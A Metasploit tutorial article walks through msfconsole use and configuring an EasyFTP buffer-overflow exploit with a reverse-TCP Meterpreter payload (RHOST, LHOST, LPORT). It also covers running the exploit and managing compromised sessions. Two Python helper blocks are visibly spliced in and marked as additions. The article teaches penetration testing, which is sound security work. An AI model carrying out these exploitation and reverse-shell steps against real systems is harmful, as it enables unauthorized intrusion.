Metasploit Fundamentals (2 of 5) – The Metasploit Console

This is the second article in a five-part series on the fundamentals of Metasploit that I wrote back in 2014.  While some of the specifics have changed over time, the series still provides a good overview for the new user of Metasploit.

Links to all of the articles are listed below:

Overview

In this article we are going to take a look at the most frequently used component of the Metasploit Framework: the Metasploit Console.  While you can certainly get to everything in the console from direct command line access, when you are first starting out you’ll likely want something to help you navigate through all the options that Metasploit has: find settings, configure exploits, and manage sessions.  If you haven’t read Part 1 of this series, Metasploit Overview and Tools, it is highly recommended that you do so at this time to get a base familiarity with the terms and concepts that we will be discussing here.

The information in this article was current as of Metasploit 4.7, and the examples that are shown were obtained using Kali Linux.

DISCLAIMER: All discussions of exploitation and compromise are made only with regard to systems that you either personally own or have been authorized by the owner in writing to assess.  The author does not condone or encourage the attacking, exploitation, or compromise of systems that do not meet those criteria.

Starting the Console

For all of the articles in this series we will assume that you are using Kali Linux 1.x with Metasploit 4.7.  If you are using Windows or Mac OS X as your base operating system the syntax for starting the Metasploit Console will be slightly different, but once you get into it the Metasploit Console has the same features and syntax across all platforms.

To start the Metasploit Console from Kali Linux, first open a terminal window by using the menu bar “Applications” –> “Accessories” –> “Terminal” and then type

msfconsole

and press enter.  That’s it. After a moment or two you’ll be presented with one of the many witty banners that are built in showing the version and making a reference to Metasploit’s many capabilities and uses.  In fact, if you want to see another one just type

banner

and press enter.

Locations in the Metasploit Console

When you’re using the Metasploit Console you’ll need to be aware of where you are, because commands are applied relative to your location. At any given time you can tell if you are interacting with Metasploit itself by looking for the

msf

at the start of the command prompt (you won’t see anything other than this to start with, but keep it in mind for when you open your first session).

If you don’t have a module selected yet you will just see

msf >

indicating that you are interacting with the global Metasploit Console settings.  Once you’ve selected a module that name will be added to the prompt to let you know that you are configuring settings for just that module.  Additionally, the command line will show what type of module it is.  For example:

  • msf post(netrc_creds) >

    This indicates that you are using the post-exploitation module “netrc_creds”, a module that collects credentials from .netrc files on *nix filesystems.

  • msf exploit(netcat110_nt) >

    This indicates that you are using the exploit module “netcat110_nt”, a module that exploits a buffer overflow condition in Netcat version 1.10 NT.

  • msf auxiliary(http_login) >

    This indicates that you are using the auxiliary module “http_login”, a module which tries to bruteforce logins via HTTP.

As with everything else we’re going to discuss in this article, there are of course more options available.  Pay attention as we move through the rest of the interface and see what other ones you notice!

Interacting with the Metasploit Console

The Metasploit Console has a wide range of features designed to make finding information and avoiding input errors easy.  Here are just a few of them:

  • Arrow Keys: You can navigate up and down through the history of commands you’ve entered by using the up and down arrow keys.
  • Tab Completion: If you enter a unique part of a command you can just use the tab key to auto-complete part or all of the rest of the command.  For instance, type
    use e

    and press the tab key twice… you’ll be prompted to show over 1000 possible options for completion (if a single completion is available it will just complete).  Now try

    use en

    and press the tab key; notice how it automatically fills in to show a command?

    use encoder/

    That’s because the only valid input that starts with “use en” is that command.

  • Search Commands: Maybe you normally use the arrow keys, but that command you entered 4 hours ago before a marathon session isn’t coming back to you right now.  Just search for it!  Press CTRL+R and then start typing whatever you can remember of it. When you find the command you are looking for just press the enter key to execute it (or press the escape key to edit it).

There are many more, but these three will help you navigate the interface quickly and easily.

Getting Help

There are three key help commands that you should be familiar with before beginning to use the Metasploit Console, each with a slightly different scope.  Let’s go over them now:

  • Global Help: The
    help

    or

    ?

    command will show the list of global commands that exist.  For instance, typing

    help

    when you first start will display a list of core commands, including the help commands and “back”, “banner”, “cd”, “color”, etc.  Moreover, if you need help with a particular global command just add it to the help command.  For example,

    help search

    will show you all of the options for the search command.  Give the following commands a try and see what you find:

    help search
    help info
    help show
    help help
  • Module Information: If you want to know about a particular module, this command is probably what you’re looking for:
    info

    This will give you an overview of the module, all the targets it applies to, the configurable options, available payload space, and even references that describe the vulnerability or methods that are exploited/used by the module.  To see information about the current module just type

    info

    or to see information about another module (or if no module is currently selected) just type

    info {module_name}

    Note that for modules you have to specify the full name, such as

    info exploit/windows/browser/ms08_053_mediaencoder
  • Configured Options: If you want to know how Metasploit itself is currently configured, or how a module is configured, there are two ways to do so.  For module-specific information you can use the
    info

    command listed above, but that is slightly limited in that it won’t show you payload configurations.  For that reason, I prefer to use the

    show

    command to find out how things are set up.  If you use

    show

    by itself you will see a list of every module and configuration set up, so take care. Just use the

    show options

    command to see what has been configured for the currently selected module, or to see the settings for Metasploit itself issue the

    show options

    command without a module selected, when the prompt says

    msf >

Finding and Selecting Modules

Okay, so at this point we’ve made several references to selecting modules, but you may be wondering how we go about doing that.  For that matter, how do we even know what modules are available?  Well, let’s start at the beginning.

Let’s assume for the sake of argument that you’ve already performed a network scan of your target and found a list of services that are running on it and responding to connection requests, as well as the version of the operating system. Maybe you found a Microsoft Windows XP SP 3 system with an EasyFTP version 1.7.0.8 server on it. How can we find out if there are any exploits in Metasploit that might be capable of exploiting this? Let’s look at three ways, from the most exhaustive but manual to the most tailored approach.

  • Manual Search: If you’re a true masochist, you can look through the list of all exploits available by using this command:
    show exploits

    That will dump out a list of every exploit available in Metasploit, including AIX, Linux, Windows, and Mac exploits.  It’s not pretty, but you will definitely be able to know without any doubt if there is a match… assuming you can stay awake long enough to review them all.  There has to be a better way…

  • General Search: Okay, so reviewing everything clearly isn’t a great option (although it’s worth doing every once in a while just to get a feel for what Metasploit has added and refresh your knowledge of the modules).  Why not just search for an exploit? We can do that using this command:
    search FTP

    This will give us a much shorter list, but will still show us results from multiple operating systems, post-exploitation modules, and even denial of service attacks.  There has to be a BETTER better way…

  • Targeted Search: Let’s review what we’re looking for.  We’d like to find an exploit for a Windows installation of EasyFTP.  If we use
    help search

    to see all the available options we can see that the “search” command can take options to restrict our searches even further.  Try the following command and see what you get back this time:

    search platform:windows type:exploit EasyFTP

    You should see something like this:

    Matching Modules
    ================
    Name                                     Disclosure Date  Rank   Description
    ----                                     ---------------  ----   -----------
    exploit/windows/ftp/easyftp_cwd_fixret   2010-02-16       great  EasyFTP Server <= 1.7.0.11 CWD Command Stack Buffer Overflow
    exploit/windows/ftp/easyftp_list_fixret  2010-07-05       great  EasyFTP Server <= 1.7.0.11 LIST Command Stack Buffer Overflow
    exploit/windows/ftp/easyftp_mkd_fixret   2010-04-04       great  EasyFTP Server <= 1.7.0.11 MKD Command Stack Buffer Overflow
    exploit/windows/http/easyftp_list        2010-02-18       great  EasyFTP Server <= 1.7.0.11 list.html path Stack Buffer Overflow
    

    Looks like we’ve found a match (or four)! Once we’ve found a module it’s actually rather simple to use it… just type

    use

    followed by the full module name.  For example, to use one of the EasyFTP modules we found previously we could just do the following:

    use exploit/windows/ftp/easyftp_list_fixret

    After we do that our command prompt should update to reflect that we are now using a particular module, so you should see this:

    msf exploit(easyftp_list_fixret) >

    Before we go any further, let’s cover how to STOP using a module. To do so, just type “back” and you will return to the main Metasploit configuration instead of any particular module. I like to use this whenever I’ve finished with one module just to ensure that I don’t accidentally start trying to configure a new module while I’m still selected on the old one. If you just typed:

    back

    let’s use that easyftp_list_fixret module again… you know how now.
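The “Matching Modules” table above is plain text, and a defender triaging scan results often wants to know whether a version found by a scanner (the EasyFTP 1.7.0.8 from our example) falls inside the version bound each module description states. The following is an added example, not code from the article or from Metasploit: it parses the quoted search output and compares a detected version against the “<= 1.7.0.11” bounds in the descriptions. The sample table is the one shown above, embedded as a constructed string.

```python
import re
from dataclasses import dataclass

# Constructed sample: the "search platform:windows type:exploit EasyFTP"
# output quoted in the article, embedded so the example runs offline.
SEARCH_OUTPUT = """\
Matching Modules
================
Name                                     Disclosure Date  Rank   Description
----                                     ---------------  ----   -----------
exploit/windows/ftp/easyftp_cwd_fixret   2010-02-16       great  EasyFTP Server <= 1.7.0.11 CWD Command Stack Buffer Overflow
exploit/windows/ftp/easyftp_list_fixret  2010-07-05       great  EasyFTP Server <= 1.7.0.11 LIST Command Stack Buffer Overflow
exploit/windows/ftp/easyftp_mkd_fixret   2010-04-04       great  EasyFTP Server <= 1.7.0.11 MKD Command Stack Buffer Overflow
exploit/windows/http/easyftp_list        2010-02-18       great  EasyFTP Server <= 1.7.0.11 list.html path Stack Buffer Overflow
"""


@dataclass
class Module:
    name: str
    disclosure: str
    rank: str
    description: str


# One data row: name, ISO date, rank, free-text description.
ROW = re.compile(r"^(\S+)\s+(\d{4}-\d{2}-\d{2})\s+(\S+)\s+(.+?)\s*$")
# Version bound inside a description, e.g. "<= 1.7.0.11".
VERSION_BOUND = re.compile(r"(<=|<|==)\s*(\d+(?:\.\d+)+)")


def parse_search(text):
    """Return the data rows of a 'search' table; header/underline rows never match ROW."""
    return [Module(*m.groups()) for line in text.splitlines() if (m := ROW.match(line))]


def version_tuple(v):
    return tuple(int(x) for x in v.split("."))


def affects(module, detected):
    """True/False if the description states a version bound; None if it needs manual review."""
    m = VERSION_BOUND.search(module.description)
    if not m:
        return None
    op, bound = m.group(1), version_tuple(m.group(2))
    d = version_tuple(detected)
    return {"<=": d <= bound, "<": d < bound, "==": d == bound}[op]


def candidate_modules(text, detected, platform="windows"):
    """Names of exploit modules for the platform whose stated version bound covers 'detected'."""
    return [mod.name for mod in parse_search(text)
            if mod.name.startswith(f"exploit/{platform}/") and affects(mod, detected)]
```

A description with no explicit bound returns None from affects(), so the row is dropped from candidate_modules() rather than silently treated as a non-match; review such rows by hand.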

    Configuring Modules

    So all of this is great, but up until now we’ve just been browsing around. Now it’s time to actually start configuring a module. As with most things, this is straightforward. Let’s get a list of the options available to us for our EasyFTP server and configure the module to attack our target.

    First up, we need to know what can be configured. If you remember there are a couple of ways to do this. Typing just

    info

    will give us the full list of information about the module, and is something I personally do for each module just to understand what it will be doing, what the limits are, and what it will be targeting. To just see the list of options, though, we can also type

    show options

    Give both a try now and compare the differences between the two. Okay, you should have noticed that this module has five things we can configure (technically there is a sixth, but we’ll get to that in a moment).

    First up are the username and password for the FTP server.  Notice also that these are both set to not be required, because Metasploit will attempt to do an anonymous login (with username “anonymous” and password “mozilla@example.com”) if they aren’t provided. After that we have the remote host (RHOST) and port (RPORT) of the server, and we do need to configure these. There’s also a TARGET option to determine what the host operating system is, but it defaulted to the correct value for us so we don’t need to change it (technically, this particular exploit only has one target).

    To set any parameter in Metasploit we just use the

    set

    command followed by the parameter name and value separated by a space. If we need to specify a value that includes a space just wrap it in quotes. Let’s assume that the EasyFTP server we found is hosted on 10.10.10.20. To set that parameter we just need to enter the following command:

    set RHOST 10.10.10.20

    Metasploit will show us that the value was set successfully by responding with the parameter and value, such as:

    RHOST => 10.10.10.20

    You’ll also notice that Metasploit automatically set the port to 21, which is the default setting for both this program and FTP.

    That’s all there is to it.  This module is now configured.  Of course, it won’t DO anything…

    Selecting Payloads

    Remember when you looked at that “info” command? You may have noticed that there was a section that said something about payloads, specifically that this exploit has space for a 512 character payload and has to avoid 5 characters.  One of the great things about Metasploit is that it will automatically limit and configure payloads (assuming you give it the necessary information), insert them into modules, and set up any backend properties necessary to complete the exploitation.  Let’s select a payload for our exploit now.

    If you want to see a list of all the payloads Metasploit comes with, just type

    search payloads

    but note that not everything shown is valid for the currently selected exploit.  Selecting which payload to use is a bit beyond the scope of this article, so for right now we’ll just default to a reverse TCP connection payload that will spawn a Meterpreter shell, which is a full-featured shell provided by Metasploit that can automate many post-exploitation features as well as let you execute Metasploit modules on a compromised system.

    Remember how we said before that there is technically a sixth parameter that can be configured?  Well, this is it.  To select the payload, we just type the “set” command again and use the “PAYLOAD” parameter, like so:

    set PAYLOAD windows/meterpreter/reverse_tcp

    Metasploit will confirm it like this:

    PAYLOAD => windows/meterpreter/reverse_tcp

    Now if we run

    show options

    we’ll see the payload options as well.  Let’s get those configured!

    I recommend leaving the “EXITFUNC” option alone until you are more comfortable with the way exploits work, so in this case we’ll leave it as “thread”. The only things we need to configure are the local host (our machine) and port that we will wait for a connection on once the exploit goes off. For instance, we might do the following (assuming our IP is 10.10.10.5):

    set LHOST 10.10.10.5
    LHOST => 10.10.10.5
    set LPORT 12345
    LPORT => 12345

    That’s it.  Type

    show options

    one last time and you can see everything configured.

    NOTE: If you accidentally set something and want to return it to the default value just type “unset” followed by the parameter name, such as:

    unset LHOST
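The set/unset/show options sequence above follows a small set of rules: required options must hold a value before the module can run, some options carry defaults (RPORT became 21 on its own), unset returns an option to its default, and a value containing spaces must be quoted. The following is an added example, not Metasploit’s code: a toy model of that option handling for the options named in this article, useful for seeing why a final “show options” before “exploit” matters. The default table is constructed from what the article describes (the LPORT default of 4444 and the “Unsetting …” echo are assumptions, not taken from the page).

```python
import shlex

# Constructed option table: NAME -> (default, required). Modelled on what
# "show options" lists for the article's exploit plus the reverse_tcp payload.
OPTION_DEFAULTS = {
    "USERNAME": (None, False),      # optional: anonymous login is tried if absent
    "PASSWORD": (None, False),
    "RHOST": (None, True),
    "RPORT": ("21", True),          # defaulted for us, as the article notes
    "TARGET": ("0", True),          # this exploit has a single target
    "PAYLOAD": (None, True),        # the "sixth" parameter
    "LHOST": (None, True),
    "LPORT": ("4444", True),        # assumed default, not stated on the page
    "EXITFUNC": ("thread", True),
}


class Datastore:
    """Minimal stand-in for a module's option store: set, unset, required-check."""

    def __init__(self, defaults=OPTION_DEFAULTS):
        self.defaults = defaults
        self.values = {name: default for name, (default, _) in defaults.items()}

    def run(self, line):
        """Handle one console line ('set NAME VALUE' or 'unset NAME') and return the echo."""
        parts = shlex.split(line)  # honours quoted values that contain spaces
        if len(parts) >= 3 and parts[0].lower() == "set":
            name, value = parts[1].upper(), " ".join(parts[2:])
            if name not in self.defaults:
                raise KeyError(f"unknown option {name}")
            self.values[name] = value
            return f"{name} => {value}"   # the confirmation format shown in the article
        if len(parts) == 2 and parts[0].lower() == "unset":
            name = parts[1].upper()
            self.values[name] = self.defaults[name][0]   # back to the default value
            return f"Unsetting {name}..."                # assumed echo text
        raise ValueError(f"unrecognised line: {line!r}")

    def missing_required(self):
        """Required options still unset; a non-empty list means 'exploit' is not ready."""
        return [name for name, (_, required) in self.defaults.items()
                if required and self.values[name] is None]

    def show_options(self):
        """The information 'show options' conveys: (name, current value, required)."""
        return [(name, self.values[name], req) for name, (_, req) in self.defaults.items()]
```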

    Running an Exploit

    At this point, running the exploit itself is rather anticlimactic.  Just type the command

    exploit

    and let it go.  Metasploit will let you know when it binds a Meterpreter handler to port 12345, runs the exploit, and gives you a shell on the remote system.  That’s all there is to it.

    Interacting with Sessions

    Metasploit has the ability to manage multiple sessions, or connections, to exploited systems.  This allows you to perform several operations simultaneously, such as gathering credentials from one system while you perform a port scan from another.

    Once you have opened a session all of the commands you enter are sent to either the system itself (if you opened a direct shell or opted for a system shell from Meterpreter) or to Meterpreter itself.  To return to the previous interface you were using from a Meterpreter session just type

    background

    and you will go up one level (for system shells you will need to exit that shell).

    Let’s say you’ve used “background” several times and exploited three boxes, and now want to go back and interact with that first session you opened. To do so, from the Metasploit Console just type the following command:

    sessions -l

    This will give you a list of the sessions that are available.  You will notice a session ID for each session that is active.  To start interacting with that session again just type the following command:

    sessions -i {session_id}

    That’s all there is to it.  If you want to kill a session, it’s done in almost exactly the same way.  Note the session ID that you want to kill and then enter this command:

    sessions -k {session_id}

    Finally, if you want to run a particular command across all of your sessions you can do so with this command:

    sessions -c {command}

    I use this last one a lot to do things like tell all my Meterpreter sessions to try to gain system access, especially after connecting to a large number of systems that all had the same vulnerability.

    Summary

    There’s been a lot of content crunched into this article, so please browse around and get familiar with the things we’ve gone over. In the next article we’ll be looking at how to use a system on two different networks as a pivot point to gain access… basically turning it into our personal router. This technique becomes absolutely required when we are looking at navigating from a less trusted network to a more trusted (and non-routable one) and only have a single system that is multi-homed (connected to both networks).
